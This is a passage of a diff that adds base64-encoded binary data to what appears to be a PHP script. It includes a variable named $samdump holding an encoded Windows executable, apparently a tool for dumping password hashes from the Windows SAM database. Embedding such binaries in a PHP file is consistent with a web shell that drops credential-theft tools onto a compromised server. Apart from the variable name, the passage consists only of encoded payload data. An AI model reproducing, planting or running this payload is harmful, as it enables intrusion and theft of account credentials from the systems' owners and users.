+AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA
+AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA
+ADF+gf4AAAAAAAAAAAAAAAD4AwAAAAAAAAAAAAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA
+BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL
+AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA
+AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA
+ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA
+CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC
+AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAQwAAAEMA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAFh9ABAAAAAA7GUA
+EOhlABDkZQAQ4GUAENxlABDYZQAQ1GUAEMxlABDEZQAQvGUAELBlABCkZQAQnGUAEJBlABCMZQAQ
+iGUAEIRlABCAZQAQfGUAEHhlABB0ZQAQcGUAEGxlABBoZQAQZGUAEGBlABBYZQAQTGUAEERlABA8
+ZQAQfGUAEDRlABAsZQAQJGUAEBhlABAQZQAQBGUAEPhkABD0ZAAQ8GQAEOhkABDUZAAQzGQAEAAA
+AAAuAAAAAAAAAAh+ABAoggAQKIIAECiCABAoggAQKIIAECiCABAoggAQKIIAECiCABB/f39/f39/
+fxB+ABAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//9QU1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUERUAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFx+ABCcfgAQAAAAAP//
+//8AAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA
+AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAA/////x4AAAA6AAAAWQAAAHcAAACWAAAA
+tAAAANMAAADyAAAAEAEAAC8BAABNAQAAbAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA8AAA
+AAIwCDAOMBMwGTAgMCUwKjAzMDgwPjBGMEswUTBYMF0wYjBrMHAwdjB+MIMwiTCQMJUwmjCjMKgw
+szC9MMcw0TDbMOUwLjE5MT8xXDGmMasxoTIyMz8zRjNjM3YzuDPVM/0zFTQfNEc0aTRzNJs0xDTc
+NAQ1PzVYNXw1kzWdNcU10DVCNnc2hjaxNtQ25Tb2Ng83FjcbNyY3QjdIN043sDfxN1o4dDh9OMA5
+xznWOd456TnvOfU5/zkXOhw6JjpAOk46VjpcOp86sToNOyg7NztTO6w7tDsOPBs8vjzNPOM8Ez7N
+Ptc/AAAAIAAAEAEAAB4wPzBWMMswkzOXM5sznzOjM6czqzOvM300iDSNNJc0nDTUNOA05zT3NP00
+BDUONSc1LzU0NUA1RTViNWg1ojWqNcQ1yjXbNfQ1ADYGNhM2IzYpNjE2TzZVNmY2fTaHNqA2Ajca
+NyA3SjdQN3I3hje4N7831DcGOBA4MThGOGo4lDiiONM42TjmOAc5LDk7OUo5fDmMOc852znlOfk5
+BzoUOhk6Hzp6OoE6yToOO/E7Cjw/PEc8YTxtPH08vDwMPR89XT2BPYg9mT2fPa89tj29PcU97D34
+PQI+Cj4SPhg+Jj41Pkc+bT56Pog+kz6mPs0+3D4ePzI/UD9cP3g/jT+jP6o/uD/LPwAwAABEAQAA
+QjBPMHQwkDCjMBcxtzEEMhwyMTJ7MsMy2jLnMgEzDzMdMygzPDNCM1AzWTNqM4YzlTOnM7AzzDPv
+M/kzAjQeNEE00TTZNN805zQyNVc1aTVvNXg2fjaGNo42ljaiNqc2sza7NsM2yzbhNuk28Tb5NgE3
+FDccN0k3ZDd0N3o3qTfRN9c34zdJOE84VziaONQ42jj9ORk6JjozOkY6TzpbOo06nzquOs861Tr2
+OgA7CzsQOxg7LztEO0o7UjtaO2U7kzufO6k7tDu+O8g7zjsRPBs8IDwlPCo8QzxJPLg8vjzcPO08
+AD0VPTM9QT1OPV49fz2LPZ09qz26Pcs9GD4wPjc+Pz5EPkg+TD51Pps+tT68PsA+xD7IPsw+0D7U
+Ptg+Ij8oPyw/MD80P5o/pT/AP8c/zD/QP9Q/8T8AAABAAAAAAQAAGzBNMFQwWDBcMGAwZDBoMGww
+cDC6MMAwxDDIMMwwHjEkMSsxNDE7MUMxSTFUMVwxqzO5M78z2TPeM+0z8zMDNA40IDQzND40RDRJ
+NE80XDR5NH80ijSQNJo0oDSwNLY0+jSgNY03mDegN7M3uTfPN9Y33DfmN+w38Tf3Nwc4EDgqODs4
+QThUOLY4YzlsOXI5fjmDOY05lDmcOaI5qTmuOb852zn9Ogo7Lzt6O4k7qTvLO/g7DDxGPE08czyL
+PKU8sDzGPM489zwEPQk9Fj0iPdw94z38PT4+UD7ZPvk+/j4dPyo/Nz9BP0s/Uz9hP38/nD+0P9Q/
+AAAAUAAAwAAAACwwQjB1MN0wAjFIMU0xaTF8MYMxlTGdMa0xvjHRMekxCTJfMnEyyDLgMucy7zL0
+Mvgy/DIlM0szZTNsM3AzdDN4M3wzgDOEM4gz0jPYM9wz4DPkM0o0VTRwNHc0fDSANIQ0oTTLNP00
+BDUINQw1EDUUNRg1HDUgNWo1cDV0NXg1fDVJNlk2izaVNmY4eTj4OAI5Hjl+OcY5zDnaOSk6WTq0
+Oro6yDomO1U7ZDu8O/Q7BjwZPFU8nj0AYAAAGAAAAPQw+DCsNLA0uDS8NMQ0yDQAcAAAyAAAAAww
+EDAcMPQy+DL8MjQzPDNEM0wzVDNcM2QzbDN0M3wzhDOMM5QznDOkM6wztDO8M8AzyDNANkQ2SDZM
+NlA2VDZYNlw2dDiUOKQ4tDhQPVg9XD1gPWQ9aD1sPXA9dD14PXw9gD2EPYg9jD2QPZQ9mD2cPaA9
+pD2oPaw9sD20Pbg9vD3APcQ9yD3MPdA91D3YPdw94D3kPeg97D3wPfQ9+D38PQA+ED4UPhg+HD4g
+PiQ+KD4sPjA+ND5APtw+4D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+
+$samdump="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAABQRQAATAEFAHD4djQAAAAAAAAAAOAADgELAQMKALIAAABqAAAAAAAAAFIA
+AAAQAAAA0AAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABQAQAABAAAAAAAAAMAAAAAABAA
+ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAgAQAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAADABAOwKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAYIQEA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhLEAAAAQAAAAsgAAAAQA
+AAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAAgfAAAA0AAAACAAAAC2AAAAAAAAAAAAAAAAAABAAABA
+LmRhdGEAAAAULwAAAPAAAAAcAAAA1gAAAAAAAAAAAAAAAAAAQAAAwC5pZGF0YQAAJAYAAAAgAQAA
+CAAAAPIAAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAACQQAAAAMAEAABIAAAD6AAAAAAAAAAAAAAAA
+AABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+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
